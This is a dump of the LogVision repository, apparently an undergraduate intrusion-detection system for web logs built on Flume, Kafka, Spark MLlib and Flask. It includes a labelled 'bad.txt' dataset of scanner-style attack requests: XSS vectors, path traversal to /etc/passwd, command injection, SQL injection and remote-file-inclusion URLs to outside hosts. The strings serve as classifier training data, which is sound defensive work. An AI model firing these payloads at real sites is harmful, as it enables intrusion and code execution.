Showing preview only (7,249K chars total). Download the full file or copy to clipboard to get everything.
Repository: xander-wang/logvision
Branch: master
Commit: 93b1eaae6c5a
Files: 75
Total size: 70.1 MB
Directory structure:
gitextract_jksm79cg/
├── .gitignore
├── README.md
├── datasets/
│ ├── access_log
│ └── learning-datasets/
│ ├── testing/
│ │ ├── bad.txt
│ │ └── good.txt
│ └── training/
│ ├── bad.txt
│ └── good.txt
├── flask/
│ ├── app.py
│ ├── requirements.txt
│ ├── static/
│ │ ├── css/
│ │ │ └── styles.css
│ │ └── js/
│ │ └── echarts/
│ │ ├── echarts.js
│ │ ├── extension/
│ │ │ ├── bmap.js
│ │ │ └── dataTool.js
│ │ └── map/
│ │ └── js/
│ │ ├── china.js
│ │ └── world.js
│ └── templates/
│ ├── about.html
│ ├── analysis.html
│ ├── id.html
│ └── index.html
├── flume/
│ └── standalone.conf
├── log_gen/
│ └── log_gen.java
└── spark/
├── build.sbt
├── project/
│ ├── assembly.sbt
│ ├── build.properties
│ ├── project/
│ │ └── target/
│ │ └── config-classes/
│ │ └── $43a0538f7780cac449ae.cache
│ └── target/
│ ├── config-classes/
│ │ ├── $16828faecf688d54d497.cache
│ │ ├── $30003e6e888c6501d0a9.cache
│ │ ├── $3d85af9b26c1a259b49e.cache
│ │ ├── $46bc225346f5c722f39f.cache
│ │ ├── $da50ce791668c9ed0f15.cache
│ │ └── $f2cabef45cb06cd331f1.cache
│ ├── scala-2.12/
│ │ └── sbt-1.0/
│ │ └── update/
│ │ └── update_cache_2.12/
│ │ ├── inputs
│ │ └── output
│ └── streams/
│ ├── _global/
│ │ ├── _global/
│ │ │ ├── _global/
│ │ │ │ └── streams/
│ │ │ │ └── out
│ │ │ └── csrLogger/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── csrConfiguration/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── csrProject/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── dependencyPositions/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── update_cache_2.12/
│ │ │ ├── input_dsp
│ │ │ └── output_dsp
│ │ ├── ivyConfiguration/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── ivySbt/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── moduleSettings/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── projectDescriptors/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── scalaCompilerBridgeScope/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ └── update/
│ │ └── _global/
│ │ └── streams/
│ │ └── out
│ ├── compile/
│ │ ├── _global/
│ │ │ └── _global/
│ │ │ ├── compileBinaryFileInputs/
│ │ │ │ └── previous
│ │ │ ├── compileOutputs/
│ │ │ │ └── previous
│ │ │ ├── compileSourceFileInputs/
│ │ │ │ └── previous
│ │ │ ├── dependencyClasspathFiles/
│ │ │ │ └── previous
│ │ │ ├── discoveredMainClasses/
│ │ │ │ └── data
│ │ │ └── managedSourcePaths/
│ │ │ └── previous
│ │ ├── compile/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── compileIncremental/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ ├── export
│ │ │ └── out
│ │ ├── copyResources/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ ├── copy-resources
│ │ │ └── out
│ │ ├── dependencyClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── exportedProducts/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── externalDependencyClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── internalDependencyClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── managedClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── unmanagedClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ └── unmanagedJars/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ └── runtime/
│ ├── dependencyClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── exportedProducts/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── externalDependencyClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── fullClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── internalDependencyClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── managedClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── unmanagedClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ └── unmanagedJars/
│ └── _global/
│ └── streams/
│ └── export
├── src/
│ └── main/
│ └── scala/
│ ├── learning.scala
│ └── streaming.scala
└── target/
└── streams/
└── _global/
└── _global/
└── checkBuildSources/
└── _global/
├── inputFileStamps/
│ └── previous
└── streams/
└── out
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
# Python
__pycache__/
*.py[cod]
*$py.class
*.so
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
.pytest_cache/
# Vue/Node
node_modules/
npm-debug.log*
yarn-debug.log*
yarn-error.log*
.DS_Store
dist/
.env
.env.local
.env.*.local
*.log
logs/
# IDE
.idea/
.vscode/
*.suo
*.ntvs*
*.njsproj
*.sln
*.sw?
# 系统文件
Thumbs.db
ehthumbs.db
Desktop.ini
================================================
FILE: README.md
================================================
# LogVision / 使用大数据的分布式实时日志分析与入侵检测系统
[开发文档](https://xander-wang.github.io/2020/05/09/logvision/)
## 版本记录(当前2.0)
- 2018.12.8 v1.0:原型版本,有bug。
- 2020.5.9 v2.0:初步完善版本,可以实现预期效果。
## 问题交流
- Telegram群组:https://t.me/logv123
## 简介
LogVision是一个整合了web日志聚合、分发、实时分析、入侵检测、数据存储与可视化的日志分析解决方案。聚合采用Apache Flume,分发采用Apache Kafka,实时处理采用Spark Streaming,入侵检测采用Spark MLlib,数据存储使用HDFS与Redis,可视化采用Flask、SocketIO、Echarts、Bootstrap。
本文下述的使用方法均面向单机伪分布式环境,你可以根据需求进行配置上的调整以适应分布式部署。
本系统各模块由个人独立开发,期间参考了一些有价值的文献与资料。本系统还是个人的本科毕业设计。
获得的奖项:2019年全国大学生计算机设计大赛安徽省二等奖、2019年安徽省信息安全作品赛二等奖。
[原型版本的介绍视频](https://www.bilibili.com/video/BV1eb411T77r)
## 系统架构

## 数据流向
(数字代表处理步骤)

## 入侵检测流程

## 项目结构
- flask:Flask Web后端
- spark:日志分析与入侵检测的实现
- flume:Flume配置文件
- log_gen:模拟日志生成器
- datasets:测试日志数据集
- images:README的图片
## 依赖与版本
- 编译与Web端需要用到的:
- Java 8, Scala 2.11.12, Python 3.8 (包依赖见requirements), sbt 1.3.8
- 计算环境中需要用到的:
- Java 8, Apache Flume 1.9.0, Kafka 2.4, Spark 2.4.5, ZooKeeper 3.5.7, Hadoop 2.9.2, Redis 5.0.8
## 使用说明
在开始之前,你需要修改源码或配置文件中的IP为你自己的地址。具体涉及到flume配置文件、Spark主程序、Flask Web后端。
### 编译Spark应用
在安装好Java8与Scala11的前提下,在```spark```目录下,初始化```sbt```:
```
sbt
```
退出```sbt shell```并使用```sbt-assembly```对Spark项目进行编译打包:
```
sbt assembly
```
然后将生成的```jar```包重命名为```logvision.jar```。
### 环境准备
你需要一个伪分布式环境(测试环境为CentOS 7),并完成了所有对应版本组件依赖的配置与运行。
使用```flume```目录下的```standalone.conf```启动一个Flume Agent。
将```datasets```文件夹中的```learning-datasets```提交如下路径:
```
/home/logv/learning-datasets
```
将```datasets```文件夹中的```access_log```提交如下路径:
```
/home/logv/access_log
```
### 入侵检测模型训练与测试
提交```jar```包至Spark集群并执行入侵检测模型的生成与测试:
```
spark-submit --class learning logvision.jar
```
你将可以看到如下结果:

两个表格分别代表正常与异常数据集的入侵检测结果,下面四个表格可用于判断识别准确率。如图中所示250条正常测试数据被检测为250条正常,识别率100%;250条异常测试数据被检测为240条异常,10条正常,准确率96%。
### 启动可视化后端
在```flask```目录下执行如下命令,下载依赖包:
```
pip3 install -r requirements.txt
```
启动Flask Web:
```
python3 app.py
```
### 启动实时日志生成器
```log_gen```中的实时日志生成器可根据传入参数(每次写入行数、写入间隔时间)将样本日志中的特定行块追加至目标日志中,以模拟实时日志的生成过程,供后续实时处理。
```
java log_gen [日志源] [目标文件] [每次追加的行数] [时间间隔(秒)]
```
提交至环境,编译并运行,每2秒将```/home/logv/access_log```文件中的5行追加至```/home/logSrc```中:
```
javac log_gen.java
java log_gen /home/logv/access_log /home/logSrc 5 2
```
### 启动分析任务
提交```jar```包至Spark集群并执行实时分析任务:
```
spark-submit --class streaming logvision.jar
```
### 查看可视化结果
至此你已经完成了后端组件的配置,通过浏览器访问Web端主机的```5000```端口可以查看到实时日志分析的可视化结果:
欢迎界面:

实时日志分析界面:

实时入侵检测界面:

================================================
FILE: datasets/access_log
================================================
[File too large to display: 40.3 MB]
================================================
FILE: datasets/learning-datasets/testing/bad.txt
================================================
<b <script>alert(1)//</script>0</script></b>
<b><script<b></b><alert(1)</script </b></b>
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<div style="[a]color[b]:[c]red">XXX</div>
<div style="\63	\06f
\0006c\00006F
\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \ or:blue;">XXX</div>
<!-- IE 6-8 --><x '="foo"><x foo='><img src=x onerror=alert(1)//'><!-- IE 6-9 --><! '="foo"><x foo='><img src=x onerror=alert(2)//'><? '="foo"><x foo='><img src=x onerror=alert(3)//'>
<embed src="javascript:alert(1)"></embed> // O10.10â, OM10.0â, GC6â, FF<img src="javascript:alert(2)"><image src="javascript:alert(2)"> // IE6, O10.10â, OM10.0â<script src="javascript:alert(3)"></script> // IE6, O11.01â, OM10.1â
<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?><root/>
<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)">]><img />
<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x></doc>
<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
<// style=x:expression\28write(1)\29>
<form><button formaction="javascript:alert(1)">X</button>
<event-source src="event.php" onload="alert(1)">
<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
<script<{alert(1)}/></script </>
<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
<object allowscriptaccess="always" data="test.swf"></object>
<style>*{x:ï½
ï½ï½ï½ï½
ï½ï½ï½ï½ï½(write(1))}</style>
<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
<body oninput=alert(1)><input autofocus>
<svg xmlns="http://www.w3.org/2000/svg"><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a></svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><animation xlink:href="javascript:alert(1)"/><animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><foreignObject xlink:href="javascript:alert(1)"/><foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/></svg>
<svg xmlns="http://www.w3.org/2000/svg"><set attributeName="onmouseover" to="alert(1)"/><animate attributeName="onunload" to="alert(1)"/></svg>
<!-- Up to Opera 10.63 --><div style=content:url(test2.svg)></div><!-- Up to Opera 11.64 - see link below --><!-- Up to Opera 12.x --><div style="background:url(test5.svg)">PRESS ENTER</div>
[A]<? foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"></ foo="><script>alert(1)</script>">[B]<? foo="><x foo='?><script>alert(1)</script>'>">[C]<! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">[D]<% foo><x foo="%><script>alert(1)</script>">
<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
<div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
<svg xmlns="http://www.w3.org/2000/svg"><handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler></svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage></svg>
<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe><iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
<!-- IE 5-9 --><div id=d><x xmlns="><iframe onload=alert(1)"></div><script>d.innerHTML+='';</script><!-- IE 10 in IE5-9 Standards mode --><div id=d><x xmlns='"><iframe onload=alert(2)//'></div><script>d.innerHTML+='';</script>
<div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div><script>with(document.getElementById("d"))innerHTML=innerHTML</script>
XXX<style>*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */<!----><!--*{color:red} /* all UA */*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */</style>
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
<a href="[a]java[b]script[c]:alert(1)">XXX</a>
<img src="x` `<script>alert(1)</script>"` `>
<script>history.pushState(0,0,'/i/am/somewhere_else');</script>
<svg xmlns="http://www.w3.org/2000/svg" id="foo"><x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/></svg>
<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
<img src onerror /" '"= alt=alert(1)//">
<title onpropertychange=alert(1)></title><title title=></title>
<!-- IE 5-8 standards mode --><a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>"><!-- IE 5-9 standards mode --><!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"><?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
<svg xmlns="http://www.w3.org/2000/svg"><a id="x"><rect fill="white" width="1000" height="1000"/></a><rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/></svg>
<svg xmlns="http://www.w3.org/2000/svg"><path d="M0,0" style="marker-start:url(test4.svg#a)"/></svg>
/top.php?stuff='|sleep 11 #
/8t9v8k7x.jspa?<script>document.cookie="testhvje=9403;"</script>
/prescription/
../../../../../../../../../../boot.ini
<script>document.cookie="testxllt=9940;"</script>
/examples/jsp/checkbox/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/ghswfouu.cfc?<meta http-equiv=set-cookie content="testsqmm=5713">
/u95h6ymu.cgi?<script>document.cookie="testkhwc=4028;"</script>
/nyjgaorz.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
/h4bi26jd.mscgi?<script>document.cookie="testhrzx=1150;"</script>
/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/en-us/w4996nr0.mscgi?<meta http-equiv=set-cookie content="testttvs=7163">
/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/frznctvhi0i5?\x00
/recordings/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00
/ghswfouu.fts?<script>document.cookie="testsqmm=5713;"</script>
/0rufe52p.htm?<script>cross_site_scripting.nasl</script>
/manager/forum_2.php?msg=10&return=<script>foo</script>
/scripts/1332010202-ror_session_fixation.nasl
/zqqemp6j.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/proto.exe
/awstats/awstats.pl?migrate=|echo;/./tmp/dedvphbiqt.sh;echo|awstats168582.txt
/examples/jsp/colors/athenareg.php?pass= ;id
/recordings/index.php?include_files[]=&include_files[query_string]=/etc/passwd
/apavxugx.dll?<meta http-equiv=set-cookie content="testdnbh=5237">
/cgi-perl/vssetcookie.exe
/phpmyadmin/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00
/help.php?q="&ver\x09>q66374774&rem\x09
/gvx7m5ti.asp?<meta http-equiv=set-cookie content="testwldz=3506">
/cgi-bin/sawmillcl.exe?ho+{complete_version}
/cgi-bin/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00
/main.php?logout="uname\x09#
/ap58k3ci.kspx?<script>cross_site_scripting.nasl</script>
/examples/jsp/colors/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\x00
/sourceforgesubscriptions_final/
/nuh3zirz.cfm?<img src="javascript:alert(cross_site_scripting.nasl);">
/bmeun223.exe?<script>document.cookie="testhhwu=7044;"</script>
/examples/jsp/colors/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd
/en-us/fo564rei.jsp?<script>cross_site_scripting.nasl</script>
/cgi.cgi/c32web.exe/changeadminpassword
/help.php?q=ping;-w;10000;-n;1;1.2.3.4&rem;
/examples/jsp/num/resetpw.php?email=../../../../../../../../../../../../etc/passwd
/oie504mr.html?<script>document.cookie="testtpby=7052;"</script>
/examples/jsp/colors/lib/authform.inc.php?path_pre=/etc/passwd\x00
/main.php?stuff="&del\x09q89486418&rem\x09
/archive.php?scriptpath=http://192.168.202.118:8080/ghl9il??
/examples/jsp/cal/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/examples/jsp/cal/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/yrxsovftek"
/examples/servlets/servlet/js/scripts.php?load=/etc/passwd\x00
//../../../../../../../../windows/win.ini
/javascript/manifest.exe
/msadm/site/index.php3?authid=\"><script>alert('vulnerable')</script>
/help.php?q=;uname\x09#
/top.php?stuff='&rm q76213281 #
/opensiteadmin/scripts/classes/formmanager.php?path=http://cirt.net/rfiinc.txt?\x00
/demo/ms-pe02/catalog.php?cid=0&sid='"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.96:8080/llumt7msyau5y?&
/4×4/
/main.php?stuff="ping\x0b-w\x0b11000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b
/dda2qr7j.exe?<script>cross_site_scripting.nasl</script>
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/&frm_user=&scr_height=&scr_width=q13664242
/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919008,1645922045 --
/main.php?logout='&del\x09q59435268\x09#
/en-us/account/print.php?what=article&id='
/examples/jsp/error/minis.php?month=../../../../../../etc/passwd
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+w+0+>>ctdn
/recordings/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/examples/servlets/servlet/index.php?act=arcade&do=stats&gameid=1'
/scripts/check-lom.php?etcdir=http://cirt.net/rfiinc.txt?
/javascript/document.key
/h5sc3gxy.dll?<script>cross_site_scripting.nasl</script>
/?<meta http-equiv=set-cookie content="testbfpq=3326">
/javascript/vbs.exe
/scripts/c0kha6w3apd3.shtml
/egaet53a.html?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/ibill.pm
/nuh3zirz.nsf?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\x00
<meta http-equiv=set-cookie content="testiklc=904">
/1qwv2p5p.do?<script>document.cookie="testvqcy=252;"</script>
/main.php?logout="&ping\x0b-w\x0b8000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b
/javascript/oauth.exe
/jujgxwav.fts?<script>document.cookie="testknim=9383;"</script>
/scripts/minis.php?month=../../../../../../etc/passwd
/fastscripts/
//<body><script src=http://www.example.com/test?rnd=q81315649></script>
/ygkjkngd.php?<meta http-equiv=set-cookie content="testnago=4518">
/main.php?stuff="rm,q47628643&rem,
/examples/jsp/num/smpwservicescgi.exe
/vhzmaia2.html?<meta http-equiv=set-cookie content="testkogj=3979">
/hjdzm96v.jsp?<script>document.cookie="testbyqe=7474;"</script>
/zroo33l4.asp?<meta http-equiv=set-cookie content="testiklc=904">
/main.php?stuff="\x0duname #
/searchsimple.php?searwords=<script>alert(412225577702)</script>&send=search
/fo564rei.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/script-r0/
/examples/jsp/sessions/mlog.html?screen=/etc/passwd
/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/llumt7msyau5y?\x00
/javascript/encode.exe
/en-us/7o5qp766.nsf?<img src="javascript:alert(cross_site_scripting.nasl);">
/d44uk9h2.idc?<meta http-equiv=set-cookie content="testmybc=2088">
/weq93ppb.fts?<img src="javascript:alert(cross_site_scripting.nasl);">
/nyjgaorz.htm?<script>cross_site_scripting.nasl</script>
/eguestproxsssql/
/scripts/admin/connect.inc
/<meta http-equiv=set-cookie content="testtfvh=2141">
/examples/jsp/num/forumdisplay.php?fid=21"><script>x</script>
/scripts/search.jsp?q=%"<script>alert(1332010391)</script>
/cgi-bin/csguestbook.cgi?command=savesetup&setup=;system('cat /etc/passwd')
/include/scripts/run_auto_suspend.cron.php?dir=http://cirt.net/rfiinc.txt?
/vac1l5vm.pl?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/servlets/servlet/shopexd.asp?catalogid='42
/javascript/.passwd.jar
/cgi-bin/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|
/rpxyx07v.jsp?<script>document.cookie="testbnli=1975;"</script>
/0rufe52p.jsp?<img src="javascript:alert(cross_site_scripting.nasl);">
/phpmyadmin/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00
ftp://192.168.24.202/*<apache_mod_proxy_ftp_glob_xss.nasl>
/vjbrrppi.cfc?<script>cross_site_scripting.nasl</script>
/javascript/phpbb.exe
/static//.../.../.../.../.../.../.../.../windows/win.ini
/javascript/htpasswd.key
/weq93ppb.x?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/shipped.exe
/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331918989')</script>
/wiki.php/<script>foo</script>
/examples/jsp/error/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt
/javascript/trash.exe
/yver8r9o.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
/manager/nessus"><script>alert('django_admin_xss.nasl')</script>/
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/frznctvhi0i5??
/jackrabbit/search.jsp?q=%"<script>alert(1331904374)</script>
/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd
/0qhcnefz.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/7dbjwpw6.php?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/servlets/servlet/cwmail.exe
/examples/jsp/colors/starnet/addons/slideshow_full.php?album_name='1914620104
/jnt3f86c.asp?<meta http-equiv=set-cookie content="testcmax=9270">
/manager/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_wk4aztya]));die;/*
/6dlc2zm9.jsp?<meta http-equiv=set-cookie content="testqpux=4016">
/examples/jsp/checkbox/simple/view_page?mv_arg=|cat /etc/passwd|
/cacti/base_qry_common.php?base_path=/etc/passwd\x00
/recordings/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>
/cacti/search.cgi?..\..\..\..\..\..\windows\win.ini
/0u75ldxq.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/top.php?stuff="&ping\x0c-w\x0c7000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
/?<meta http-equiv=set-cookie content="testulex=4996">
/main.php?stuff=;uname >q81835212 #
/main.php?stuff="ping -w 9000 -n 1 1.2.3.4&rem
/javascript/webmail.exe
/ripscript/
/examples/jsp/jsp2/el/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\x00
/help.php?q=ping;-w;7000;-n;1;1.2.3.4|rem;
/www/delivery/ac.php?bannerid=-1331909226+or+1=1+--+';passthru(base64_decode($_server[http_nessus_1wubmpss]));die;/*
/3hlysl2x.kspx?<script>document.cookie="testgjbe=8505;"</script>
/main.php?stuff=&ver\x09>q65268393&rem\x09
/examples/jsp/jsp2/el/index.php?show=../../../../../../../../../../../etc/passwd\x00
/5qnlm5z2.php3?<meta http-equiv=set-cookie content="testsixi=8451">
/bxnyrhmh.php3?<script>document.cookie="testmjct=1867;"</script>
/cacti/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd
/5o9zq43e.asp?<script>cross_site_scripting.nasl</script>
/yver8r9o.php?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 911180970,2,397451365,4,5,6,7,8,9,0,1,2,3 --
/interface/login/login_frame.php?site=<script>alert(owasp zap);</script>' and '1'='1
/help.php?q="\x0duname\x09>q41994252\x09#
/cacti/lang/lang.php?lang_path=/etc/passwd\x00
/ghostscript/
/ybz5rz7a.asp?<script>document.cookie="testsbvw=6289;"</script>
/auth-passwd/
/606wkcop.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/top.php?stuff='&sleep\x0910\x09#
/t_scriptrap/
/examples/jsp/num/hw3.cgi?daysonly=0).system('id').(
/7o5qp766.cgi?<script>cross_site_scripting.nasl</script>
/index.php?id='
/misc/audio.php?recording=../version.inc
/main.php?stuff="ver&rem\x0c
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/fphgokkkuu.sh'); function v
/phpmyadmin/calendar_admin.pl?config=|cat /etc/passwd|
/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904208')</script>
/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919219','5'--
/p043snfr.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/login.php?procesa=si&usuario_nkads_admin=' or isnull(1/0)/*
/h5sc3gxy.nsf?<img src="javascript:alert(cross_site_scripting.nasl);">
/d44uk9h2.x?<meta http-equiv=set-cookie content="testmybc=2088">
/javascript/www1.exe
/recordings/styles.php?toroot=/etc/passwd\x00
/note.txt?f_notini=&t_note=&nomentreprise=blah&filenote=../../windows/win.ini
/fo564rei.idc?<script>cross_site_scripting.nasl</script>
/0w155a7c.idc?<script>cross_site_scripting.nasl</script>
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/augpuxhmyg.sh'); function v
/header_noscript/
/..\..\\..\..\\..\..\\..\..\boot.ini
/examples/jsp/jsp2/jspx/sgdynamo.exe?htname=sgdynamo.exe
/raanw4ia.exe?<img src="javascript:alert(cross_site_scripting.nasl);">
/main.php?logout='del q43392461 #
